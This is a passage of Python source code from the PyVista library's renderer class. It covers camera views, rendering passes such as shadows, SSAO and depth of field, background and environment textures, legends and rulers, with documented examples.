self.add_floor(**floor_kwargs)\n if self.cube_axes_actor is not None:\n self.cube_axes_actor.update_bounds(self.bounds)\n if not np.allclose(self.scale, [1.0, 1.0, 1.0]):\n self.cube_axes_actor.SetUse2DMode(True)\n else:\n self.cube_axes_actor.SetUse2DMode(False)\n self.Modified()\n\n def reset_camera(self, render=True, bounds=None):\n \"\"\"Reset the camera of the active render window.\n\n The camera slides along the vector defined from camera\n position to focal point until all of the actors can be seen.\n\n Parameters\n ----------\n render : bool, default: True\n Trigger a render after resetting the camera.\n\n bounds : iterable(int), optional\n Automatically set up the camera based on a specified bounding box\n ``(xmin, xmax, ymin, ymax, zmin, zmax)``.\n\n Examples\n --------\n Add a mesh and place the camera position too close to the\n mesh. 
Then reset the camera and show the mesh.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere(), show_edges=True)\n >>> pl.set_position((0, 0.1, 0.1))\n >>> pl.reset_camera()\n >>> pl.show()\n\n \"\"\"\n if bounds is not None:\n self.ResetCamera(*bounds)\n else:\n self.ResetCamera()\n\n self.reset_camera_clipping_range()\n\n if render:\n self.parent.render()\n self.Modified()\n\n def isometric_view(self):\n \"\"\"Reset the camera to a default isometric view.\n\n DEPRECATED: Please use ``view_isometric``.\n\n \"\"\"\n self.view_isometric()\n\n def view_isometric(self, negative=False, render=True):\n \"\"\"Reset the camera to a default isometric view.\n\n The view will show all the actors in the scene.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the other isometric direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n Isometric view.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.view_isometric()\n >>> pl.show()\n\n Negative isometric view.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.view_isometric(negative=True)\n >>> pl.show()\n\n \"\"\"\n position = self.get_default_cam_pos(negative=negative)\n self.camera_position = CameraPosition(*position)\n self.camera_set = negative\n self.reset_camera(render=render)\n\n def view_vector(self, vector, viewup=None, render=True):\n \"\"\"Point the camera in the direction of the given vector.\n\n Parameters\n ----------\n vector : sequence[float]\n Direction to point the camera in.\n\n viewup : sequence[float], optional\n Sequence describing the view up of the camera.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n \"\"\"\n focal_pt = self.center\n if viewup is None:\n viewup = self._theme.camera['viewup']\n cpos = CameraPosition(vector + np.array(focal_pt), focal_pt, viewup)\n self.camera_position = cpos\n self.reset_camera(render=render)\n\n def view_xy(self, negative=False, render=True):\n \"\"\"View the XY plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the XY plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_xy()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('xy', negative=negative), render=render)\n\n def view_yx(self, negative=False, render=True):\n \"\"\"View the YX plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the YX plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_yx()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('yx', negative=negative), render=render)\n\n def view_xz(self, negative=False, render=True):\n \"\"\"View the XZ plane.\n\n Parameters\n 
----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the XZ plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_xz()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('xz', negative=negative), render=render)\n\n def view_zx(self, negative=False, render=True):\n \"\"\"View the ZX plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the ZX plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_zx()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('zx', negative=negative), render=render)\n\n def view_yz(self, negative=False, render=True):\n \"\"\"View the YZ plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the YZ plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_yz()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('yz', negative=negative), render=render)\n\n def view_zy(self, negative=False, render=True):\n \"\"\"View the ZY plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the ZY plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_zy()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('zy', negative=negative), render=render)\n\n def disable(self):\n \"\"\"Disable this renderer's camera from being interactive.\"\"\"\n self.SetInteractive(0)\n\n def enable(self):\n \"\"\"Enable this renderer's camera to be interactive.\"\"\"\n self.SetInteractive(1)\n\n def add_blurring(self):\n \"\"\"Add blurring.\n\n This can be added several times to increase the degree of blurring.\n\n Examples\n --------\n Add two blurring passes to the plotter and show it.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere(), show_edges=True)\n >>> pl.add_blurring()\n >>> pl.add_blurring()\n >>> pl.show()\n\n See :ref:`blur_example` for a full example using this method.\n\n \"\"\"\n self._render_passes.add_blur_pass()\n\n def remove_blurring(self):\n \"\"\"Remove a single blurring pass.\n\n You will need to run this multiple times to remove all blurring passes.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere())\n >>> pl.add_blurring()\n >>> pl.remove_blurring()\n 
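>>> # the single blur pass added above is now removed\n        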
>>> pl.show()\n\n \"\"\"\n self._render_passes.remove_blur_pass()\n\n def enable_depth_of_field(self, automatic_focal_distance=True):\n \"\"\"Enable depth of field plotting.\n\n Parameters\n ----------\n automatic_focal_distance : bool, default: True\n Use automatic focal distance calculation. When enabled, the center\n of the viewport will always be in focus regardless of where the\n focal point is.\n\n Examples\n --------\n Create five spheres and demonstrate the effect of depth of field.\n\n >>> import pyvista as pv\n >>> from pyvista import examples\n >>> pl = pv.Plotter(lighting=\"three lights\")\n >>> pl.background_color = \"w\"\n >>> for i in range(5):\n ... mesh = pv.Sphere(center=(-i * 4, 0, 0))\n ... color = [0, 255 - i * 20, 30 + i * 50]\n ... _ = pl.add_mesh(\n ... mesh,\n ... show_edges=False,\n ... pbr=True,\n ... metallic=1.0,\n ... color=color,\n ... )\n ...\n >>> pl.camera.zoom(1.8)\n >>> pl.camera_position = [\n ... (4.74, 0.959, 0.525),\n ... (0.363, 0.3116, 0.132),\n ... (-0.088, -0.0075, 0.996),\n ... ]\n >>> pl.enable_depth_of_field()\n >>> pl.show()\n\n See :ref:`depth_of_field_example` for a full example using this method.\n\n \"\"\"\n self._render_passes.enable_depth_of_field_pass(automatic_focal_distance)\n\n def disable_depth_of_field(self):\n \"\"\"Disable depth of field plotting.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=\"three lights\")\n >>> pl.enable_depth_of_field()\n >>> pl.disable_depth_of_field()\n\n \"\"\"\n self._render_passes.disable_depth_of_field_pass()\n\n def enable_eye_dome_lighting(self):\n \"\"\"Enable eye dome lighting (EDL).\n\n Returns\n -------\n vtk.vtkOpenGLRenderer\n VTK renderer with eye dome lighting pass.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.enable_eye_dome_lighting()\n\n \"\"\"\n self._render_passes.enable_edl_pass()\n\n def disable_eye_dome_lighting(self):\n \"\"\"Disable eye dome lighting (EDL).\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.disable_eye_dome_lighting()\n\n \"\"\"\n self._render_passes.disable_edl_pass()\n\n def enable_shadows(self):\n \"\"\"Enable shadows.\n\n Examples\n --------\n First, plot without shadows enabled (default)\n\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter(lighting='none', window_size=(1000, 1000))\n >>> light = pv.Light()\n >>> light.set_direction_angle(20, -20)\n >>> pl.add_light(light)\n >>> _ = pl.add_mesh(mesh, color='white', smooth_shading=True)\n >>> _ = pl.add_mesh(pv.Box((-1.2, -1, -1, 1, -1, 1)))\n >>> pl.show()\n\n Now, enable shadows.\n\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter(lighting='none', window_size=(1000, 1000))\n >>> light = pv.Light()\n >>> light.set_direction_angle(20, -20)\n >>> pl.add_light(light)\n >>> _ = pl.add_mesh(mesh, color='white', smooth_shading=True)\n >>> _ = pl.add_mesh(pv.Box((-1.2, -1, -1, 1, -1, 1)))\n >>> pl.enable_shadows()\n >>> pl.show()\n\n \"\"\"\n self._render_passes.enable_shadow_pass()\n\n def disable_shadows(self):\n \"\"\"Disable shadows.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.disable_shadows()\n\n \"\"\"\n self._render_passes.disable_shadow_pass()\n\n def enable_ssao(self, radius=0.5, bias=0.005, kernel_size=256, blur=True):\n \"\"\"Enable surface space ambient occlusion (SSAO).\n\n SSAO can approximate shadows more efficiently than ray-tracing\n and produce similar results. 
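Rather than tracing rays, SSAO samples the depth buffer around each pixel and darkens creases, corners, and points of close contact. 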
Use this when you wish to plot the\n        occlusion effect that nearby meshes have on each other by blocking\n        nearby light sources.\n\n        See `Kitware: Screen-Space Ambient Occlusion\n        <https://www.kitware.com/ssao/>`_ for more details.\n\n        Parameters\n        ----------\n        radius : float, default: 0.5\n            Neighbor pixels considered when computing the occlusion.\n\n        bias : float, default: 0.005\n            Tolerance factor used when comparing pixel depth.\n\n        kernel_size : int, default: 256\n            Number of samples used. This controls the quality where a higher\n            number increases the quality at the expense of computation time.\n\n        blur : bool, default: True\n            Controls if the occlusion buffer should be blurred before combining it\n            with the color buffer.\n\n        Examples\n        --------\n        Generate a :class:`pyvista.UnstructuredGrid` with many tetrahedrons\n        nearby each other and plot it without SSAO.\n\n        >>> import pyvista as pv\n        >>> ugrid = pv.ImageData(dimensions=(3, 2, 2)).to_tetrahedra(12)\n        >>> exploded = ugrid.explode()\n        >>> exploded.plot()\n\n        Enable SSAO with the default parameters.\n\n        >>> pl = pv.Plotter()\n        >>> _ = pl.add_mesh(exploded)\n        >>> pl.enable_ssao()\n        >>> pl.show()\n\n        \"\"\"\n        self._render_passes.enable_ssao_pass(radius, bias, kernel_size, blur)\n\n    def disable_ssao(self):\n        \"\"\"Disable surface space ambient occlusion (SSAO).\"\"\"\n        self._render_passes.disable_ssao_pass()\n\n    def get_pick_position(self):\n        \"\"\"Get the pick position/area as ``x0, y0, x1, y1``.\n\n        Returns\n        -------\n        tuple\n            Pick position as ``x0, y0, x1, y1``.\n\n        \"\"\"\n        x0 = int(self.GetPickX1())\n        x1 = int(self.GetPickX2())\n        y0 = int(self.GetPickY1())\n        y1 = int(self.GetPickY2())\n        return x0, y0, x1, y1\n\n    def set_background(self, color, top=None, right=None, side=None, corner=None):\n        \"\"\"Set the background color of this renderer.\n\n        Parameters\n        ----------\n        color : ColorLike, optional\n            Either a string, rgb list, or hex color string. Defaults\n            to theme default. For example:\n\n            * ``color='white'``\n            * ``color='w'``\n            * ``color=[1.0, 1.0, 1.0]``\n            * ``color='#FFFFFF'``\n\n        top : ColorLike, optional\n            If given, this will enable a gradient background where the\n            ``color`` argument is at the bottom and the color given in\n            ``top`` will be the color at the top of the renderer.\n\n        right : ColorLike, optional\n            If given, this will enable a gradient background where the\n            ``color`` argument is at the left and the color given in\n            ``right`` will be the color at the right of the renderer.\n\n        side : ColorLike, optional\n            If given, this will enable a gradient background where the\n            ``color`` argument is at the center and the color given in\n            ``side`` will be the color at the side of the renderer.\n\n        corner : ColorLike, optional\n            If given, this will enable a gradient background where the\n            ``color`` argument is at the center and the color given in\n            ``corner`` will be the color at the corner of the renderer.\n\n        Examples\n        --------\n        Set the background color to black with a gradient to white at\n        the top of the plot.\n\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> actor = pl.add_mesh(pv.Cone())\n        >>> pl.set_background('black', top='white')\n        >>> pl.show()\n\n        \"\"\"\n        self.SetBackground(Color(color, default_color=self._theme.background).float_rgb)\n        if not (right is side is corner is None) and vtk_version_info < (9, 3): # pragma: no cover\n            from pyvista.core.errors import VTKVersionError\n\n            raise VTKVersionError(\n                \"`right` or `side` or `corner` cannot be used under VTK v9.3.0. 
Try installing VTK v9.3.0 or newer.\"\n )\n if not (\n (top is right is side is corner is None)\n or (top is not None and right is side is corner is None)\n or (right is not None and top is side is corner is None)\n or (side is not None and top is right is corner is None)\n or (corner is not None and top is right is side is None)\n ): # pragma: no cover\n raise ValueError(\"You can only set one argument in top, right, side, corner.\")\n if top is not None:\n self.SetGradientBackground(True)\n self.SetBackground2(Color(top).float_rgb)\n elif right is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(_vtk.vtkViewport.GradientModes.VTK_GRADIENT_HORIZONTAL)\n self.SetBackground2(Color(right).float_rgb)\n elif side is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(\n _vtk.vtkViewport.GradientModes.VTK_GRADIENT_RADIAL_VIEWPORT_FARTHEST_SIDE\n )\n self.SetBackground2(Color(side).float_rgb)\n elif corner is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(\n _vtk.vtkViewport.GradientModes.VTK_GRADIENT_RADIAL_VIEWPORT_FARTHEST_CORNER\n )\n self.SetBackground2(Color(corner).float_rgb)\n else:\n self.SetGradientBackground(False)\n self.Modified()\n\n def set_environment_texture(self, texture, is_srgb=False):\n \"\"\"Set the environment texture used for image based lighting.\n\n This texture is supposed to represent the scene background. If\n it is not a cubemap, the texture is supposed to represent an\n equirectangular projection. If used with raytracing backends,\n the texture must be an equirectangular projection and must be\n constructed with a valid ``vtk.vtkImageData``.\n\n Parameters\n ----------\n texture : pyvista.Texture\n Texture.\n\n is_srgb : bool, default: False\n If the texture is in sRGB color space, set the color flag on the\n texture or set this parameter to ``True``. Textures are assumed\n to be in linear color space by default.\n\n Examples\n --------\n Add a skybox cubemap as an environment texture and show that the\n lighting from the texture is mapped on to a sphere dataset. Note how\n even when disabling the default lightkit, the scene lighting will still\n be mapped onto the actor.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=None)\n >>> cubemap = examples.download_sky_box_cube_map()\n >>> _ = pl.add_mesh(\n ... pv.Sphere(), pbr=True, metallic=0.9, roughness=0.4\n ... )\n >>> pl.set_environment_texture(cubemap)\n >>> pl.camera_position = 'xy'\n >>> pl.show()\n\n \"\"\"\n # cube_map textures cannot use spherical harmonics\n if texture.cube_map:\n self.AutomaticLightCreationOff()\n # disable spherical harmonics was added in 9.1.0\n if hasattr(self, 'UseSphericalHarmonicsOff'):\n self.UseSphericalHarmonicsOff()\n\n self.UseImageBasedLightingOn()\n self.SetEnvironmentTexture(texture, is_srgb)\n self.Modified()\n\n def remove_environment_texture(self):\n \"\"\"Remove the environment texture.\n\n Examples\n --------\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=None)\n >>> cubemap = examples.download_sky_box_cube_map()\n >>> _ = pl.add_mesh(\n ... pv.Sphere(), pbr=True, metallic=0.9, roughness=0.4\n ... 
)\n >>> pl.set_environment_texture(cubemap)\n >>> pl.remove_environment_texture()\n >>> pl.camera_position = 'xy'\n >>> pl.show()\n\n \"\"\"\n self.UseImageBasedLightingOff()\n self.SetEnvironmentTexture(None)\n self.Modified()\n\n def close(self):\n \"\"\"Close out widgets and sensitive elements.\"\"\"\n self.RemoveAllObservers()\n if hasattr(self, 'axes_widget'):\n self.hide_axes() # Necessary to avoid segfault\n self.axes_actor = None\n del self.axes_widget\n\n if self._empty_str is not None:\n self._empty_str.SetReferenceCount(0)\n self._empty_str = None\n\n def on_plotter_render(self):\n \"\"\"Notify renderer components of explicit plotter render call.\"\"\"\n if self.__charts is not None:\n for chart in self.__charts:\n # Notify Charts that plotter.render() is called\n chart._render_event(plotter_render=True)\n\n def deep_clean(self, render=False):\n \"\"\"Clean the renderer of the memory.\n\n Parameters\n ----------\n render : bool, optional\n Render the render window after removing the bounding box\n (if applicable).\n\n \"\"\"\n if self.cube_axes_actor is not None:\n self.cube_axes_actor = None\n\n if hasattr(self, 'edl_pass'):\n del self.edl_pass\n if hasattr(self, '_box_object'):\n self.remove_bounding_box(render=render)\n if hasattr(self, '_shadow_pass') and self._shadow_pass is not None:\n self.disable_shadows()\n try:\n if self.__charts is not None:\n self.__charts.deep_clean()\n self.__charts = None\n except AttributeError: # pragma: no cover\n pass\n\n self._render_passes.deep_clean()\n self.remove_floors(render=render)\n self.remove_legend(render=render)\n self.RemoveAllViewProps()\n self._actors = {}\n self._camera = None\n self._bounding_box = None\n self._marker_actor = None\n self._border_actor = None\n # remove reference to parent last\n self.parent = None\n\n def __del__(self):\n \"\"\"Delete the renderer.\"\"\"\n self.deep_clean()\n\n def enable_hidden_line_removal(self):\n \"\"\"Enable hidden line removal.\"\"\"\n self.UseHiddenLineRemovalOn()\n\n def disable_hidden_line_removal(self):\n \"\"\"Disable hidden line removal.\"\"\"\n self.UseHiddenLineRemovalOff()\n\n @property\n def layer(self): # numpydoc ignore=RT01\n \"\"\"Return or set the current layer of this renderer.\"\"\"\n return self.GetLayer()\n\n @layer.setter\n def layer(self, layer): # numpydoc ignore=GL08\n self.SetLayer(layer)\n\n @property\n def viewport(self): # numpydoc ignore=RT01\n \"\"\"Viewport of the renderer.\n\n Viewport describes the ``(xstart, ystart, xend, yend)`` square\n of the renderer relative to the main renderer window.\n\n For example, a renderer taking up the entire window will have\n a viewport of ``(0.0, 0.0, 1.0, 1.0)``, while the viewport of\n a renderer on the left-hand side of a horizontally split window\n would be ``(0.0, 0.0, 0.5, 1.0)``.\n\n Returns\n -------\n tuple\n Viewport in the form ``(xstart, ystart, xend, yend)``.\n\n Examples\n --------\n Show the viewport of a renderer taking up half the render\n window.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter(shape=(1, 2))\n >>> pl.renderers[0].viewport\n (0.0, 0.0, 0.5, 1.0)\n\n \"\"\"\n return self.GetViewport()\n\n @property\n def width(self): # numpydoc ignore=RT01\n \"\"\"Width of the renderer.\"\"\"\n xmin, _, xmax, _ = self.viewport\n return self.parent.window_size[0] * (xmax - xmin)\n\n @property\n def height(self): # numpydoc ignore=RT01\n \"\"\"Height of the renderer.\"\"\"\n _, ymin, _, ymax = self.viewport\n return self.parent.window_size[1] * (ymax - ymin)\n\n def add_legend(\n self,\n labels=None,\n 
bcolor=(0.5, 0.5, 0.5),\n border=False,\n size=(0.2, 0.2),\n name=None,\n loc='upper right',\n face='triangle',\n ):\n \"\"\"Add a legend to render window.\n\n Entries must be a list containing one string and color entry for each\n item.\n\n Parameters\n ----------\n labels : list, optional\n When set to ``None``, uses existing labels as specified by\n\n - :func:`add_mesh `\n - :func:`add_lines `\n - :func:`add_points `\n\n List containing one entry for each item to be added to the\n legend. Each entry must contain two strings, [label,\n color], where label is the name of the item to add, and\n color is the color of the label to add.\n\n bcolor : ColorLike, default: (0.5, 0.5, 0.5)\n Background color, either a three item 0 to 1 RGB color\n list, or a matplotlib color string (e.g. ``'w'`` or ``'white'``\n for a white color). If None, legend background is\n disabled.\n\n border : bool, default: False\n Controls if there will be a border around the legend.\n Default False.\n\n size : sequence[float], default: (0.2, 0.2)\n Two float sequence, each float between 0 and 1. For example\n ``(0.1, 0.1)`` would make the legend 10% the size of the\n entire figure window.\n\n name : str, optional\n The name for the added actor so that it can be easily\n updated. If an actor of this name already exists in the\n rendering window, it will be replaced by the new actor.\n\n loc : str, default: \"upper right\"\n Location string. One of the following:\n\n * ``'upper right'``\n * ``'upper left'``\n * ``'lower left'``\n * ``'lower right'``\n * ``'center left'``\n * ``'center right'``\n * ``'lower center'``\n * ``'upper center'``\n * ``'center'``\n\n face : str | pyvista.PolyData | NoneType, default: \"triangle\"\n Face shape of legend face. One of the following:\n\n * None: ``None``\n * Line: ``\"-\"`` or ``\"line\"``\n * Triangle: ``\"^\"`` or ``'triangle'``\n * Circle: ``\"o\"`` or ``'circle'``\n * Rectangle: ``\"r\"`` or ``'rectangle'``\n * Custom: :class:`pyvista.PolyData`\n\n Passing ``None`` removes the legend face. A custom face can be\n created using :class:`pyvista.PolyData`. This will be rendered\n from the XY plane.\n\n Returns\n -------\n vtk.vtkLegendBoxActor\n Actor for the legend.\n\n Examples\n --------\n Create a legend by labeling the meshes when using ``add_mesh``\n\n >>> import pyvista as pv\n >>> from pyvista import examples\n >>> sphere = pv.Sphere(center=(0, 0, 1))\n >>> cube = pv.Cube()\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(\n ... sphere, 'grey', smooth_shading=True, label='Sphere'\n ... )\n >>> _ = plotter.add_mesh(cube, 'r', label='Cube')\n >>> _ = plotter.add_legend(bcolor='w', face=None)\n >>> plotter.show()\n\n Alternatively provide labels in the plotter.\n\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(sphere, 'grey', smooth_shading=True)\n >>> _ = plotter.add_mesh(cube, 'r')\n >>> legend_entries = []\n >>> legend_entries.append(['My Mesh', 'w'])\n >>> legend_entries.append(['My Other Mesh', 'k'])\n >>> _ = plotter.add_legend(legend_entries)\n >>> plotter.show()\n\n \"\"\"\n if self.legend is not None:\n self.remove_legend()\n self._legend = _vtk.vtkLegendBoxActor()\n\n if labels is None:\n # use existing labels\n if not self._labels:\n raise ValueError(\n 'No labels input.\\n\\n'\n 'Add labels to individual items when adding them to'\n 'the plotting object with the \"label=\" parameter. 
'\n 'or enter them as the \"labels\" parameter.'\n )\n\n self._legend.SetNumberOfEntries(len(self._labels))\n for i, (vtk_object, text, color) in enumerate(self._labels.values()):\n if face is None:\n # dummy vtk object\n vtk_object = pyvista.PolyData([0.0, 0.0, 0.0])\n\n self._legend.SetEntry(i, vtk_object, text, color.float_rgb)\n\n else:\n self._legend.SetNumberOfEntries(len(labels))\n\n legend_face = make_legend_face(face)\n for i, (text, color) in enumerate(labels):\n self._legend.SetEntry(i, legend_face, text, Color(color).float_rgb)\n\n if loc is not None:\n if loc not in ACTOR_LOC_MAP:\n allowed = '\\n'.join([f'\\t * \"{item}\"' for item in ACTOR_LOC_MAP])\n raise ValueError(f'Invalid loc \"{loc}\". Expected one of the following:\\n{allowed}')\n x, y, size = map_loc_to_pos(loc, size, border=0.05)\n self._legend.SetPosition(x, y)\n self._legend.SetPosition2(size[0], size[1])\n\n if bcolor is None:\n self._legend.SetUseBackground(False)\n else:\n self._legend.SetUseBackground(True)\n self._legend.SetBackgroundColor(Color(bcolor).float_rgb)\n\n self._legend.SetBorder(border)\n\n self.add_actor(self._legend, reset_camera=False, name=name, pickable=False)\n return self._legend\n\n def remove_legend(self, render=True):\n \"\"\"Remove the legend actor.\n\n Parameters\n ----------\n render : bool, default: True\n Render upon actor removal. Set this to ``False`` to stop\n the render window from rendering when a the legend is removed.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh, label='sphere')\n >>> _ = pl.add_legend()\n >>> pl.remove_legend()\n\n \"\"\"\n if self.legend is not None:\n self.remove_actor(self.legend, reset_camera=False, render=render)\n self._legend = None\n\n @property\n def legend(self): # numpydoc ignore=RT01\n \"\"\"Legend actor.\"\"\"\n return self._legend\n\n def add_ruler(\n self,\n pointa,\n pointb,\n flip_range=False,\n number_labels=5,\n show_labels=True,\n font_size_factor=0.6,\n label_size_factor=1.0,\n label_format=None,\n title=\"Distance\",\n number_minor_ticks=0,\n tick_length=5,\n minor_tick_length=3,\n show_ticks=True,\n tick_label_offset=2,\n label_color=None,\n tick_color=None,\n ):\n \"\"\"Add ruler.\n\n The ruler is a 2D object that is not occluded by 3D objects.\n To avoid issues with perspective, it is recommended to use\n parallel projection, i.e. :func:`Plotter.enable_parallel_projection`,\n and place the ruler orthogonal to the viewing direction.\n\n The title and labels are placed to the right of ruler moving from\n ``pointa`` to ``pointb``. Use ``flip_range`` to flip the ``0`` location,\n if needed.\n\n Since the ruler is placed in an overlay on the viewing scene, the camera\n does not automatically reset to include the ruler in the view.\n\n Parameters\n ----------\n pointa : sequence[float]\n Starting point for ruler.\n\n pointb : sequence[float]\n Ending point for ruler.\n\n flip_range : bool, default: False\n If ``True``, the distance range goes from ``pointb`` to ``pointa``.\n\n number_labels : int, default: 5\n Number of labels to place on ruler.\n\n show_labels : bool, default: True\n Whether to show labels.\n\n font_size_factor : float, default: 0.6\n Factor to scale font size overall.\n\n label_size_factor : float, default: 1.0\n Factor to scale label size relative to title size.\n\n label_format : str, optional\n A printf style format for labels, e.g. 
'%E'.\n\n title : str, default: \"Distance\"\n The title to display.\n\n number_minor_ticks : int, default: 0\n Number of minor ticks between major ticks.\n\n tick_length : int, default: 5\n Length of ticks in pixels.\n\n minor_tick_length : int, default: 3\n Length of minor ticks in pixels.\n\n show_ticks : bool, default: True\n Whether to show the ticks.\n\n tick_label_offset : int, default: 2\n Offset between tick and label in pixels.\n\n label_color : ColorLike, optional\n Either a string, rgb list, or hex color string for\n label and title colors.\n\n .. warning::\n This is either white or black.\n\n tick_color : ColorLike, optional\n Either a string, rgb list, or hex color string for\n tick line colors.\n\n Returns\n -------\n vtk.vtkActor\n VTK actor of the ruler.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> cone = pv.Cone(height=2.0, radius=0.5)\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(cone)\n\n Measure x direction of cone and place ruler slightly below.\n\n >>> _ = plotter.add_ruler(\n ... pointa=[cone.bounds[0], cone.bounds[2] - 0.1, 0.0],\n ... pointb=[cone.bounds[1], cone.bounds[2] - 0.1, 0.0],\n ... title=\"X Distance\",\n ... )\n\n Measure y direction of cone and place ruler slightly to left.\n The title and labels are placed to the right of the ruler when\n traveling from ``pointa`` to ``pointb``.\n\n >>> _ = plotter.add_ruler(\n ... pointa=[cone.bounds[0] - 0.1, cone.bounds[3], 0.0],\n ... pointb=[cone.bounds[0] - 0.1, cone.bounds[2], 0.0],\n ... flip_range=True,\n ... title=\"Y Distance\",\n ... )\n >>> plotter.enable_parallel_projection()\n >>> plotter.view_xy()\n >>> plotter.show()\n\n \"\"\"\n label_color = Color(label_color, default_color=self._theme.font.color)\n tick_color = Color(tick_color, default_color=self._theme.font.color)\n\n ruler = _vtk.vtkAxisActor2D()\n\n ruler.GetPositionCoordinate().SetCoordinateSystemToWorld()\n ruler.GetPosition2Coordinate().SetCoordinateSystemToWorld()\n ruler.GetPositionCoordinate().SetReferenceCoordinate(None)\n ruler.GetPositionCoordinate().SetValue(pointa[0], pointa[1], pointa[2])\n ruler.GetPosition2Coordinate().SetValue(pointb[0], pointb[1], pointb[2])\n\n distance = np.linalg.norm(np.asarray(pointa) - np.asarray(pointb))\n if flip_range:\n ruler.SetRange(distance, 0)\n else:\n ruler.SetRange(0, distance)\n\n ruler.SetTitle(title)\n ruler.SetFontFactor(font_size_factor)\n ruler.SetLabelFactor(label_size_factor)\n ruler.SetNumberOfLabels(number_labels)\n ruler.SetLabelVisibility(show_labels)\n if label_format:\n ruler.SetLabelFormat(label_format)\n ruler.GetProperty().SetColor(*tick_color.int_rgb)\n if label_color != Color('white'):\n # This property turns black if set\n ruler.GetLabelTextProperty().SetColor(*label_color.int_rgb)\n ruler.GetTitleTextProperty().SetColor(*label_color.int_rgb)\n ruler.SetNumberOfMinorTicks(number_minor_ticks)\n ruler.SetTickVisibility(show_ticks)\n ruler.SetTickLength(tick_length)\n ruler.SetMinorTickLength(minor_tick_length)\n ruler.SetTickOffset(tick_label_offset)\n\n self.add_actor(ruler, reset_camera=True, pickable=False)\n return ruler\n\n def add_legend_scale(\n self,\n corner_offset_factor=2.0,\n bottom_border_offset=30,\n top_border_offset=30,\n left_border_offset=30,\n right_border_offset=30,\n bottom_axis_visibility=True,\n top_axis_visibility=True,\n left_axis_visibility=True,\n right_axis_visibility=True,\n legend_visibility=True,\n xy_label_mode=False,\n render=True,\n color=None,\n font_size_factor=0.6,\n label_size_factor=1.0,\n label_format=None,\n 
